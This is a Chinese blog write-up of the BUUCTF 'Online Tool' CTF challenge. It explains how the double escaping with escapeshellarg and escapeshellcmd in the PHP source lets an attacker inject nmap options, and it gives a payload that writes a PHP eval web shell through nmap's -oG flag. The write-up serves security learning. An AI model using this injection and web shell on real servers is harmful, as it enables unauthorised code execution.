[BUUCTF 2018]Online Tool CTF

最新推荐文章于 2024-04-11 21:19:41 发布
最新推荐文章于 2024-04-11 21:19:41 发布
阅读量727 收藏 3
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyaowangchuan/article/details/110130746
版权

在这里插入图片描述

https://buuoj.cn/challenges#[BUUCTF%202018]Online%20Tool
进入环境

在这里插入图片描述

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
//获取客户端真实的IP地址

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

在这里插入图片描述

$_SERVER 是一个包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组。这个数组中的项目由 Web 服务器创建。

在PHP 中用$_SERVER['REMOTE_ADDR']取得客户端的 IP地址,但如果客户端是使用代理服务器来访问,那取到的就是代理服务器的 IP 地址,而不是真正的客户端 IP 地址。要想透过代理服务器取得客户端的真实 IP 地址,就要使用$_SERVER['HTTP_X_FORWARDED_FOR']来读取。
如果客户端没有通过代理服务器来访问,那么用$_SERVER[“HTTP_X_FORWARDED_FOR”]取到的值将是空的
也就是说

使用代理服务器不使用代理服务器
$_SERVER['REMOTE_ADDR']代理服务器的IP客户端真实IP
$_SERVER['HTTP_X_FORWARDED_FOR']客户端真实IP空值

在这里插入图片描述
$_GET['host'] get方式传值,值就会在地址栏上显示

isset() 函数如果 host 存在并且值不是 NULL 则返回 TRUE,否则返回 FALSE。

highlight_file() 函数对文件进行 PHP 语法高亮显示。语法通过使用 HTML 标签进行高亮。
提示:用于高亮的颜色可通过 php.ini 文件进行设置或者通过调用 ini_set() 函数进行设置。
注释:当使用该函数时,整个文件都将被显示,包括密码和其他敏感信息!

__FILE__ :被称为PHP魔术常量,返回当前执行PHP脚本的完整路径和文件名,包含一个绝对路径
在这里插入图片描述

PHP escapeshellarg()+escapeshellcmd()
escapeshellarg会对所有单引号进行转义,并且给字符串增加一个 单引号
escapeshellcmd仅会对落单了的单引号进行转义,对一些特殊字符进行转义如:& # ; ` | * ? ~ < > ^ ( ) [ ] { } $

<?php 
var_dump(escapeshellcmd("& # ; ` | * ? ~ < > ^ ( ) [ ] { } $"));
echo "<br>";

举个PHP escapeshellarg()+escapeshellcmd()例子
https://paper.seebug.org/164/

传入的参数是:172.17.0.2' -v -d a=1
经过escapeshellarg处理后变成了'172.17.0.2'\'' -v -d a=1',即先对单引号转义,再用单引号将左右两部分括起来从而起到连接的作用。
经过escapeshellcmd处理后变成'172.17.0.2'\\'' -v -d a=1\',这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义:http://php.net/manual/zh/function.escapeshellcmd.php
最后执行的命令是curl '172.17.0.2'\\'' -v -d a=1\',由于中间的\\被解释为\而不再是转义字符,所以后面的'没有被转义,与再后面的'配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a=1',即向172.17.0.2\发起请求,POST 数据为a=1'。

简单的来说就是两次转译后出现了问题,没有考虑到单引号的问题

回到题目
nmap命令中 有一个参数-oG可以实现将命令和结果写到文件
我们要实现
nmap -T5 -sT -Pn --host-timeout 2 -F <?php @eval($_POST[123]); ?> -oG hack.php
即实现?host=<?php @eval($_POST["123"]);?> -oG hack.php

上传木马
?host=’ <?php @eval($_POST["123"]);?> -oG hack.php ’
转化为:’’’’<?php @eval($_POST["123"]); ?> -oG hack.php ‘’’’

输出为:

<?php @eval($_POST[123]); ?> -oG hack.php \

在这里插入图片描述

写在575f39abf22a73f31ee6a3c821adfceb文件
用蚁剑连接
在这里插入图片描述

之后找到flag

在这里插入图片描述

wuyaoooo
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 3855
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
2018南宁ctf RE题目
12-18
2018年4道南宁CTF RE题目,有Windows逆向也有linux逆向
[BUUCTF 2018]Online Tool
pakho_C的博客
02-21 875
web第36题 [BUUCTF 2018]Online Tool 打开靶场 php代码审计 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET[
CTFSHOW 反序列化篇
羽的博客
12-11 1万+
web254 没搞懂和反序列化有啥关系,直接传username=xxxxxx&password=xxxxxx出flag web255 请求包内容如下 首先get传的username和password都是xxxxxx 因为源码里面 $user = unserialize($_COOKIE['user']); $user->login($username,$password); 就是是说我们需要让反序列后的结果是ctfShowUser的实例化对象。又因为只有$this->isVip是tr
[CTF]使用浏览器firefox插件伪装IP地址
最新发布
2301_81475812的博客
04-11 1299
浏览器想必是大家再熟悉不过的东东了,我们会经常使用它访问下载一些页面或文件。比如说一些网站后台会记录我们的IP地址,假如我们处于隐私考虑不希望网站记录真实IP,这时候我们应该怎么办呢?本文主要介绍如何使用firefox的插件伪装IP,希望对需要的同学有所帮助。点击‘选项’打开安装的插件,找到“IP Adress”位置,此处可以输入我们随便写的IP地址,例如 123.123.123.123。此时细心的同学会发现没有‘保存’或‘确定’选项,只需要关闭该插件窗口或重启浏览器即可起作用了。Firefox浏览器。
buuctf部分题目wp
zhhhb1005的博客
06-19 1068
主要是记录平时做题遇见的没见过的题目
[HITCON 2017]SSRFme ctf web buuctf
wuyaowangchuan的博客
11-12 505
<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $sandbox = "sandbox/..
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
h1-702-2018-ctf-wu
05-09
【标题】"h1-702-2018-ctf-wu"是一个针对HackerOne平台的H1-702 CTF比赛的挑战项目,它以Android应用程序的形式呈现。这个CTF(Capture The Flag)比赛是网络安全领域的实战演练,参赛者通过解决一系列安全问题来...
2018上海CTF“骇极杯”逆向WP
11-12
2018上海CTF“骇极杯”逆向WP2018上海CTF“骇极杯”逆向WP
i春秋CTF ssrfme (peal函数中get命令漏洞)命令执行 详细题解+原理 学习过程
AAAAAAAAAAAA66的博客
12-16 1381
前几天刚做一道命令执行的题目累的够呛,这会刷题又碰见一道,所以做个总结,梳理一下自己学到的各方面知识。 题目 分析 <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
[BUUCTF] 备赛刷题第一天
Dannie01的博客
11-01 2085
[极客大挑战 2019]RCE ME Wallbreaker_Easy 绕过disabled function 狠简单 一把嗦 [SUCTF 2019]EasyWeb <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_ex
CTF-web 第十三部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
%3c?php else:?%3e,[红日安全]代码审计Day15 - $_SERVER['PHP_SELF']导致的防御失效问题
weixin_33784572的博客
03-24 352
本文由红日安全成员: DYBOY 编写,如有不当,还望斧正。前言大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫 PHP-Audit-Labs 。现在大家所看到的系列文章,属于项目 第一阶段 的内容,本阶段的内容题目均来自 PHP SECURITY CALENDAR 2017 。对于每一道题目,我们均给出对应的分析,并结...
PHP中$_SERVER的详细解释
lzgzzuedu的专栏
03-19 782
$_SERVER[PHP_SELF] #当前正在执行脚本的文件名(相对于网站根目录的路径及文件名),与 document root相关。  $_SERVER[’argv’] #传递给该脚本的参数。$_SERVER[’argc’] #包含传递给程序的命令行参数的个数(如果运行在命令行模式)。$_SERVER[’GATEWAY_INTERFACE’] #服务器使用的 CGI 规范的版本。例如,“C
buuctf [第五章 ctf之re章]easy_rust 高级语言逆向wp
09-17
在这个buuctf的Easy Rust高级语言逆向题目中,我们需要对给定的Rust语言程序进行逆向分析,并找到程序的存放在flag变量中的答案。 首先,我们需要使用Rust编译器将给定的源代码进行编译。然后,我们可以使用静态分析和动态调试的方法来分析程序的行为。 通过分析程序的源代码,我们可以看到在main函数中,程序会读取一个名为input的字符串,并将它与一组数字进行逐个比较。如果比较结果为真,程序会将对应位置的flag字符进行替换。 为了分析比较的逻辑,我们可以使用动态调试的工具,如GDB。在GDB中,我们可以在比较之前的位置设置一个断点。然后,我们可以逐步执行程序,并观察变量的值来分析比较的逻辑。 在此题中,我们可以发现比较的逻辑为input[i] == flag[i] + 5。这意味着,我们需要将输入字符串中的每个字符和flag中的每个字符进行比较,比较结果为真则通过。 再进一步观察flag变量,我们会发现flag的初始值为"aaaaaa"。由于我们需要找到正确的flag,我们可以把它作为初始值来尝试不断的迭代,直到找到符合比较逻辑的正确flag。 综上所述,我们可以编写一个脚本来尝试不同的flag值,并与给定的input进行比较,直到找到正确的flag。最后,我们将找到的flag flag{r3v3r53_mUST_8E_"aI1_DONE"} 总结起来,buuctf的Easy Rust高级语言逆向题目通过分析Rust程序的源代码和使用动态调试工具,以及编写一个脚本来找到正确的flag值。通过理解比较逻辑和尝试不同的可能性,我们可以成功地完成这个题目。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值